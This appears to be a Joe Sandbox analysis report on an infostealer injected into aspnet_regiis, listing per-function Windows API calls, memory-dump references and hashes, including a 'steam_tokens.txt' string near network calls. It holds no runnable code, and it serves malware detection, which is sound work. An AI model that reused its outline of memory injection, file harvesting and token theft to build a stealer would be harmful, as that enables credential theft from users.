API ID: Heap$Process$Allocate$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CapsCreateCurrentDeviceEnumInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$AllocChangeComputerDefaultDevicesDirectoryDisplayErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorReleaseSnapshotToolhelp32VolumeWindowsWow64Zone
String ID:
API String ID: 2111899077-0
Opcode ID: 7ad1072ff329cc6b3ca2ca11662e24bfebf03fdbd888a94a77d97f0047137bca
Instruction ID: 31cd68504547371f43d8783c676c66da453e1d63eace98b0e51d34c51648a854
Opcode Fuzzy Hash: 7ad1072ff329cc6b3ca2ca11662e24bfebf03fdbd888a94a77d97f0047137bca
Instruction Fuzzy Hash: D3727F72C54018ABCB1AFB91DCACDFE733EAF14300F9442A9991662454EF747B58CEA4

Function 027565D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 0275668F

Strings

@, xrefs: 02756669

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: f9aa3f30ab25cef799a9091bc2d0e291aa211552e546954eb16f9c5ea74ed0ab
Instruction ID: 5a935b7f762735bf3331dc30f3b3942e0e11f82a202c4fa22673de3d93c8f27e
Opcode Fuzzy Hash: f9aa3f30ab25cef799a9091bc2d0e291aa211552e546954eb16f9c5ea74ed0ab
Instruction Fuzzy Hash: D921D6B4A00218EFDB04CF89C594BADFBF5FB48305F508699D919AB341D7759A81CF81

Function 02756730 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c884c16e2141e85429b0ab4025c099dc78b5b11578301d72f36010d0ed50523
Instruction ID: 39d30cb81e6dc9363b88cb9bc9d246fb1bb7d0fe437d8b6e2a9bca37dc7c9f76
Opcode Fuzzy Hash: 8c884c16e2141e85429b0ab4025c099dc78b5b11578301d72f36010d0ed50523
Instruction Fuzzy Hash: 036118B5D00228DFDB18DF94D988BEEB7B9BB04304F508598E80567280D7B5AA94DF91

Function 02762B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766E10: lstrlen.KERNEL32(00000000,?,?,02762BE0,0276D59B,0276D59A,?,?,027637C6,00000000,?,02BA0578,?,0276D8AC,?,00000000), ref: 02766E1B
Part of subcall function 02766E10: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766E75

lstrlen.KERNEL32(00000000,00000000,0276D599,?,?,?,?,?,?,02762FF8,?), ref: 02762B5A

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Strings

steam_tokens.txt, xrefs: 02762B6F

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: b5a54193ac75c572b8d8cb20f2fb71ca61b7d1e771d3eec8ddfe8514e32b9f61
Instruction ID: 064423ed21d22f3aa81fff94f13785fb9d7c6be495ce3cf4b0ebf750a32bb112
Opcode Fuzzy Hash: b5a54193ac75c572b8d8cb20f2fb71ca61b7d1e771d3eec8ddfe8514e32b9f61
Instruction Fuzzy Hash: 4CF0E1B1D241086ADF1AFBF2EC6D9FDB73E9E14744B804664EC1666090EF346618CEE1

Function 02751120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,027636C7,0276D6E3), ref: 0275112A
ExitProcess.KERNEL32 ref: 0275113E

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 12c14c832597ea6c67452b0548208f58139c38356bc71f487328e67c2ca1418c
Instruction ID: 7ba3579530a5609efc68fc09448e1cd173226a3ffbe40d54f8be1a4d344cf0ec
Opcode Fuzzy Hash: 12c14c832597ea6c67452b0548208f58139c38356bc71f487328e67c2ca1418c
Instruction Fuzzy Hash: C7D05E74D4420C8BCB00EFE099496EDFBB8AB0C612F0018A5DC0562241E7705854CA65

Function 0275ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 027597F0: memcmp.MSVCRT ref: 0275980B
Part of subcall function 027597F0: memset.MSVCRT ref: 0275983E
Part of subcall function 027597F0: LocalAlloc.KERNEL32(00000040,?), ref: 0275988E

lstrlen.KERNEL32(00000000), ref: 0275B190
lstrlen.KERNEL32(00000000), ref: 0275B1A4

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 40db26969816281df3467d2f4980af29714f39442275c9207f77154c27b4b4ec
Instruction ID: c535b99e5c5f21caa2ca88cb53dbc0040615fa92960db10aaca6854dd2189b95
Opcode Fuzzy Hash: 40db26969816281df3467d2f4980af29714f39442275c9207f77154c27b4b4ec
Instruction Fuzzy Hash: C0E1CE729241149BCF1AEBA1DC6CEFE733EBF54340F844569E90662094EF746A58CFA0

Function 0275A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

lstrlen.KERNEL32(00000000), ref: 0275A95A
lstrlen.KERNEL32(00000000), ref: 0275A96E

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 0a42ab7f4e8f7258bd7b8d1cdddd0096f7b888043b69e10e577a38c2b9007269
Instruction ID: 2c16d0809a006fdcf40e8d85d6f2ee79297beadd6876ab22be2bdb2fc82331ef
Opcode Fuzzy Hash: 0a42ab7f4e8f7258bd7b8d1cdddd0096f7b888043b69e10e577a38c2b9007269
Instruction Fuzzy Hash: 4B9110729141149BCF1AEBA1DC6CEFEB33EAF54344F844569E90663054EF786A18CFA0

Function 0275AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

lstrlen.KERNEL32(00000000), ref: 0275AC1E
lstrlen.KERNEL32(00000000), ref: 0275AC32

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 94104ee1c494c0a8af85e033d2635ecc6dfc005342f65aa927f6eb92fe8df333
Instruction ID: 593b7ecfb1f2aeef29424399fd2d4156deb05285f4adebb5516aff95a8a5dfbc
Opcode Fuzzy Hash: 94104ee1c494c0a8af85e033d2635ecc6dfc005342f65aa927f6eb92fe8df333
Instruction Fuzzy Hash: 5071DC719241149BCF16EBA1DC6CDFE737EBF54344F844528A90667094EF746A18CFA0

Function 027627E0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 027654D0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

lstrcat.KERNEL32(?,00000000), ref: 0276281A
lstrcat.KERNEL32(?,02BB5550), ref: 02762838

Part of subcall function 02762570: wsprintfA.USER32 ref: 02762589
Part of subcall function 02762570: FindFirstFileA.KERNEL32(?,?), ref: 027625A0

Part of subcall function 02762570: StrCmpCA.SHLWAPI(?,0276D864), ref: 027625CE
Part of subcall function 02762570: StrCmpCA.SHLWAPI(?,0276D868), ref: 027625E4
Part of subcall function 02762570: FindNextFileA.KERNEL32(000000FF,?), ref: 027627B9
Part of subcall function 02762570: FindClose.KERNEL32(000000FF), ref: 027627CE

Part of subcall function 02762570: wsprintfA.USER32 ref: 0276260A
Part of subcall function 02762570: StrCmpCA.SHLWAPI(?,0276D4B2), ref: 0276261C
Part of subcall function 02762570: wsprintfA.USER32 ref: 02762639
Part of subcall function 02762570: PathMatchSpecA.SHLWAPI(?,?), ref: 0276266F
Part of subcall function 02762570: lstrcat.KERNEL32(?,02BB5968), ref: 0276269B
Part of subcall function 02762570: lstrcat.KERNEL32(?,0276D880), ref: 027626AD
Part of subcall function 02762570: lstrcat.KERNEL32(?,?), ref: 027626BE
Part of subcall function 02762570: lstrcat.KERNEL32(?,0276D884), ref: 027626D0
Part of subcall function 02762570: lstrcat.KERNEL32(?,?), ref: 027626E4
Part of subcall function 02762570: CopyFileA.KERNEL32(?,?,00000001), ref: 027626FA
Part of subcall function 02762570: DeleteFileA.KERNEL32(?), ref: 02762779

Part of subcall function 02762570: wsprintfA.USER32 ref: 0276265B

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 07b406f964218834c99dc37345824defc0b89f0ff62a8d416140b1a208897976
Instruction ID: 2246eeb06a9df3dbf811167a3cee9199879ebfa7c5fa2440a7676460498cd716
Opcode Fuzzy Hash: 07b406f964218834c99dc37345824defc0b89f0ff62a8d416140b1a208897976
Instruction Fuzzy Hash: 0141D4B6E441146BD715FBA0DC99EFA777E9794700F004548BE0A87141FE70AB988FE1

Function 02756050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(027567AE,027567AE,00003000,00000040), ref: 027560F6
VirtualAlloc.KERNEL32(00000000,027567AE,00003000,00000040), ref: 02756143

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 44e1fc46ceb4810d085f9251d179b675c12acf9504cc789a8809bebfb86ac0fe
Instruction ID: 745cd4f700c9cf37d3ed92ca5c44023e9d4d97bd576d79025f96c6913b36db90
Opcode Fuzzy Hash: 44e1fc46ceb4810d085f9251d179b675c12acf9504cc789a8809bebfb86ac0fe
Instruction Fuzzy Hash: F041EC34A00218EFCB44CF58C490BADFBB5FF48314F5482A9E9499B341C771EA81CB84

Function 02762A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 027654D0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

lstrcat.KERNEL32(?,00000000), ref: 02762ABA
lstrcat.KERNEL32(?,02BB6028), ref: 02762AD8

Part of subcall function 02762570: wsprintfA.USER32 ref: 02762589
Part of subcall function 02762570: FindFirstFileA.KERNEL32(?,?), ref: 027625A0

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: df512b9f9d7d2b94afe69ec3de8751201ac1b163a37d82cdde9231c935bc40ff
Instruction ID: bf36bf63323a04bf82f606414daf31ed0d364981f5ebe1bcae72504e92097a98
Opcode Fuzzy Hash: df512b9f9d7d2b94afe69ec3de8751201ac1b163a37d82cdde9231c935bc40ff
Instruction Fuzzy Hash: 070196B6E441186BCB15FBB0DC5DEFA733D9B54701F404584AE4957041FE70AA988FE1

Function 027543B0 Relevance: 2.5, APIs: 2, Instructions: 44memorystringCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,027636AB), ref: 027543C0
strlen.MSVCRT ref: 027543F9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AllocLocalstrlen
String ID:
API String ID: 3248042016-0
Opcode ID: 954cb9d22bcea5db228624b0b083f423868b505cdaf10fda3152a0e9af846415
Instruction ID: d22d53087768570daefa32cea3c0d18a02b9ae068ab58789278b6bf2909bf367
Opcode Fuzzy Hash: 954cb9d22bcea5db228624b0b083f423868b505cdaf10fda3152a0e9af846415
Instruction Fuzzy Hash: B5110C74A04248EFCB04CFA8D8D4BAEBBB5FF49305F148099E919A7341D671AA60CB55

Function 02751060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0275110E,?,?,027636CC), ref: 02751073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0275110E,?,?,027636CC), ref: 027510B7

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 04991bdcd1c64f33f91d6063e4dff9f97fbb8b048d3d78a44c773b4211e959c4
Instruction ID: 6e5c21cbae3915fe7b9ae71526e66b933110380b3c1577204eff7c76d157fbac
Opcode Fuzzy Hash: 04991bdcd1c64f33f91d6063e4dff9f97fbb8b048d3d78a44c773b4211e959c4
Instruction Fuzzy Hash: 18F0E975681218BBE7149AB45C59FBEF3AC9705B05F704554F904F3240D7719E049690

Function 02765480 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0275E9F4,?,00000000,?,00000000,0276D76E,0276D76B), ref: 0276548F

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 55e7b984f5cc064918a3cf46c1f1d5bc52557b35047d0462ee3a256918f5f51b
Instruction ID: bd2683447378760dead0de754c8a2d292e564cbcbfa6fef8ed9ad617f582b0ba
Opcode Fuzzy Hash: 55e7b984f5cc064918a3cf46c1f1d5bc52557b35047d0462ee3a256918f5f51b
Instruction Fuzzy Hash: 67F03974C0520CEBCB04EFA4C54D6ACBB78EF00325F4081A9DC266B680DB345B59DF80

Function 027654D0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
